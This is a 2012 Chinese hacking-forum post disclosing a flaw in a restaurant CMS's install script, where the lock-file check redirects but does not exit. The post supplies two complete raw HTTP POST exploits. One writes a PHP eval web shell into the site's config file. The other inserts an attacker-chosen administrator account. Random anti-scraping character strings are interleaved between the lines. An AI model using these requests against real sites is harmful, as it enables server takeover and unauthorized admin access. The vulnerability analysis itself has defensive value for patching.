中国网络渗透测试联盟
标题:
口福科技餐厅cms漏洞(可getshell)
[打印本页]
作者:
admin
时间:
2012-12-4 11:13
标题:
口福科技餐厅cms漏洞(可getshell)
问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
( q; w# r! C/ {4 ]4 I# t8 p
4 v9 |& q6 Y- b9 l9 k, Q
<?php
) x+ {5 r' `& p8 ]
if(file_exists("../install.lock"))
% x. E3 Q% x: i- ~& _" V
{
8 S' h/ }8 T/ V7 T
header("Location: ../");//没有退出
; ~# U9 ~" [8 @9 H, L; M" Q. V, [
}
( _* ]8 g2 v4 }9 o0 g4 u' `
( G% t- o! d( w' x7 O8 k; H
//echo 'tst';exit;
- C& v0 K1 o4 _1 Y# _
require_once("init.php");
) Q) T- X. x" h4 z" F$ w
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
! L5 r' o$ X3 z- V: s3 O2 Z5 }8 ^
{
- ~% F& l. Q4 D: D+ A& D" _. c* q2 v
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
w9 D- g. @7 n2 _; Y$ W. X
: f8 k7 _* S/ O. O4 ]1 y% m3 y
1、getshell(很危险)
& P, y. J* t; r: u% N% R
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
% @3 q0 r' l3 p1 ^% V% A/ y& b
{
& k6 Q5 D* P7 o6 }/ v' i" s7 `
$smarty->assign("step",1);
" d- G O2 [% d6 S1 Q
$smarty->display("index.html");
1 j) h1 k' O4 M: X
}elseif($_REQUEST['step']==2)
. r) ^4 `$ h' g
{
0 g& J+ }$ x' X' @5 J
$mysql_host=trim($_POST['mysql_host']);
) U: d5 n$ E2 O8 v$ ]- g6 j
$mysql_user=trim($_POST['mysql_user']);
T/ J3 S8 v( b6 a. W7 l
$mysql_pwd=trim($_POST['mysql_pwd']);
) I7 |7 P& x+ u) v
$mysql_db=trim($_POST['mysql_db']);
0 l: }/ F" {: H8 U
$tblpre=trim($_POST['tblpre']);
V; _. c3 y f. _
$domain==trim($_POST['domain']);
; E, \; R; L" y Q, c4 C. y, _6 p
$str="<?php \r\n";
; c% ?% D4 b% k
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
2 P& p" Y. h8 `1 O
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
1 i+ Q/ A2 p# e# z
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
1 b, N% O, s0 i W" h4 U
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
$ B; n; L# n, n8 r6 a: d1 \& I; b7 T9 P
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
]- `( u3 f: z7 l* n) @4 ~
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
o, ]% p# c2 `4 w9 S- `
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
* X x9 h2 n& x# ]1 ~* n8 h
$str.='define("SKINS","default");'."\r\n";
( E6 Z2 @$ G. S* r, z: d6 e. O' r
$str.='?>';
! v5 o7 ]$ n+ |- W3 M5 \
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
, E3 O5 D' X5 ~; V+ h! `; u: M2 j
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
& w8 a+ n+ t% U
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
' D& P: {' [0 ^$ k9 E1 k
Host: 192.168.80.129
2 w* }8 G; Z! U6 Y! G$ w, T, z, r
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
8 P% D$ }, Z8 |: k. @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ B* `) d! A$ j' t, ]
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
* I* S/ k: a, z$ s% m& f3 M6 I1 j0 L
Accept-Encoding: gzip, deflate
+ a; N- C1 h/ C) `; ^
Referer:
http://192.168.80.129/canting/install/index.php?step=1
; `# d0 \ [7 A. @/ a
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
( I- w* k8 K6 ?8 I
Content-Type: application/x-www-form-urlencoded
2 ~0 n2 q$ P; q' d: {
Content-Length: 126
0 e5 @8 l5 y5 C, y0 x
3 B& s1 J0 N5 x4 e
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
t5 m9 ^+ T9 s
但是这个方法很危险,将导致网站无法运行。
9 ^! ?9 M% D3 n% P7 ]5 ~7 [- J
1 U% G+ ]# e* i% l1 x7 d1 E6 w2 f
2、直接添加管理员
1 Q$ C. c- q; F+ L
- G6 K! I3 [1 a2 W( \. H' E! o
elseif($_REQUEST['step']==5)
3 M1 }" i9 J+ ?7 E1 d
{
% L! a( R; n* ?; h0 c9 `
if($_POST)
/ t* m5 c% |" ]* U. e) K7 C2 m5 {' o
{ require_once("../config/config.inc.php");
% k" F" M: `. d1 [/ O
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
% O# G! W, ?9 ~, ?0 G
mysql_select_db(MYSQL_DB,$link);
" s8 S3 B! f; R* ^2 g
mysql_query("SET NAMES ".MYSQL_CHARSET );
1 g9 I3 }4 V: H0 r1 A
mysql_query("SET sql_mode=''");
d, p8 @% u; s( o# Z9 ]" Q% Y) B% l
: H8 X) B) n, A; g0 s$ F7 |
$adminname=trim($_POST['adminname']);
! D8 m6 \! {$ G, M2 ^; e: s# B+ \
$pwd1=trim($_POST['pwd1']);
- V) w3 L- J7 w" n) z- O
$pwd2=trim($_POST['pwd2']);
- S( z. b5 C8 n% C( d/ l* S# J
if(empty($adminname))
% X' O& X8 H8 a& @- e* |
{
& G; w J. @% I4 N
% |( t% Z) Q `3 e+ q. F( ]
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
; ]7 Y0 M+ @3 }5 K5 ]
exit();
$ H, s7 i% U" M3 I( j7 ~/ [
}
; M- i3 N2 B& c3 i. @
if(($pwd1!=$pwd2) or empty($pwd1))
* H% {5 A$ ~# H1 D; h7 k
{
% y% j/ d( Z; v
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
7 R1 g2 y/ `4 ?
}
9 p" M+ ?3 ]9 l3 K$ A" R4 d
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
8 r/ u7 E4 z9 F g5 r" o
}
, E+ _. o/ O/ L' i: R& D
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
$ ^6 d2 q3 c6 k7 i7 b6 s. ~
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
/ l# [3 s* l$ w. n0 H7 |
Host: 192.168.80.129
. [5 o0 ~& C. E) w" {6 e
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
" f8 N% S1 q- F6 j) [5 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
! _. V9 x f" C$ s K* S6 y
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
2 L; h8 c' s8 L# }& _9 _
Accept-Encoding: gzip, deflate
* [1 ]1 H7 s+ \' p4 d
Referer:
http://www.2cto.com
/canting/install/index.php?step=1
3 h! \/ K. r- z7 r/ U
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
( G$ \, o) ~$ X! Z9 p- l
Content-Type: application/x-www-form-urlencoded
/ B$ r7 l( ~5 I
Content-Length: 46
: _5 J2 m) R _+ a( q/ T7 a4 P. `
/ I& ?' f2 ]7 i2 P# K) J
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
3 d, u. I, `: h" {6 n" u8 S
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2